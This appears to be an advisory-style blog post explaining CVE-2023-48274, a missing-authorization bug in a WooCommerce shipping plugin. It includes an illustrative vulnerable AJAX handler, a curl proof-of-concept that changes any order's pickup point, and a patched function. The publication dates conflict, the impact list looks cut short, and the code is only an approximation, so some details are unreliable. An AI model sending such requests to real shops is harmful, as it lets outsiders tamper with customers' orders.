*Published: June 2024*
What is CVE-2023-48274?
CVE-2023-48274 is a critical Missing Authorization vulnerability in the widely-used Mondial Relay WooCommerce plugin (specifically, WCMultiShipping, versions up to 2.3.5). This bug allows attackers to access and manipulate sensitive shipping functions without proper permission checks—all due to poorly configured access control within the plugin.
If you run a WooCommerce store and use Mondial Relay’s plugin for multi-shipping, you’re at risk if you haven’t updated past version 2.3.5. Malicious hackers could exploit this flaw to:
Impact order processing
Let’s break it all down with details, proof-of-concept code, and practical advice.
The Vulnerability: In Simple Terms
The WCMultiShipping plugin handles different shipping options/orders for WooCommerce. But here’s the problem—it fails to check if the current user has permission to access or change certain AJAX actions.
In technical speak: the plugin registers hooks (via add_action('wp_ajax_*')) but forgets to check if the user is logged in, or has necessary privileges, when these actions are called.
Here’s a simplified example, based on code similar to what’s reported
// Inside the plugin file, say wcms-ajax.php
add_action( 'wp_ajax_wcms_add_pickup_point', 'wcms_add_pickup_point' );
function wcms_add_pickup_point() {
$point_id = $_POST['point_id'];
$order_id = $_POST['order_id'];
update_post_meta( $order_id, '_wcms_relay_point', $point_id );
wp_send_json_success( array( 'message' => 'Pickup point added.' ) );
}
No authentication or authorization checks!
- Any logged-in user (or even, in some setups, any site visitor) can call this AJAX action and change shipping data for ANY order.
How Can an Attacker Exploit It?
An attacker can *send a crafted HTTP POST request* to the site’s /wp-admin/admin-ajax.php endpoint, invoking the vulnerable AJAX action (action=wcms_add_pickup_point). They just need to guess or know some order IDs!
Exploit PoC (Proof-of-Concept)
Suppose the site lives at https://vuln-site.com. Here’s an example POST request using curl (or it could be mimicked with JavaScript, Postman, etc.):
curl -X POST https://vuln-site.com/wp-admin/admin-ajax.php \
-d 'action=wcms_add_pickup_point' \
-d 'order_id=1234' \
-d 'point_id=BOGUS_PICKUP'
Result: The plugin will assign the pickup point 'BOGUS_PICKUP' to order 1234, regardless of who sent the request!
Why Does This Happen?
- The plugin developers did NOT require required user capabilities (like administrator, shop_manager, or even logged-in customer).
They didn’t check user roles or nonces.
- Common best practice is to add checks like current_user_can( 'manage_woocommerce' ), which is totally missing.
Fix and Mitigation
Are you vulnerable?
- Check Plugins in your WordPress dashboard. If you see WCMultiShipping (versions up to 2.3.5), you are vulnerable!
Update!
Upgrade WCMultiShipping plugin to the latest version immediately.
Restrict Admin-Ajax
Block or limit access to /wp-admin/admin-ajax.php for anonymous users—though this may break site functionality for some plugins.
Until you can update, modify the vulnerable function to add user capability checks
function wcms_add_pickup_point() {
if ( ! current_user_can( 'manage_woocommerce' ) ) {
wp_send_json_error( array( 'message' => 'Unauthorized.' ), 403 );
exit;
}
// ... original code ...
}
References and More Reading
- Official Plugin Page – WCMultiShipping
- Mondial Relay for WooCommerce
- CVE Details & Tracking *(link updates as published)*
- WordPress Plugin Security Best Practices
Final Thoughts
This vulnerability is a sharp reminder: always check user permissions and input in your plugins or themes. If you run any plugin handling orders, customers, or shipping—update, audit, and stay safe.
Found this useful? Please share with other WooCommerce store owners!
*Disclaimer: This information is for educational awareness and defensive purposes only. Do not exploit vulnerabilities on any system without permission!*
Timeline
Published on: 12/09/2024 13:15:32 UTC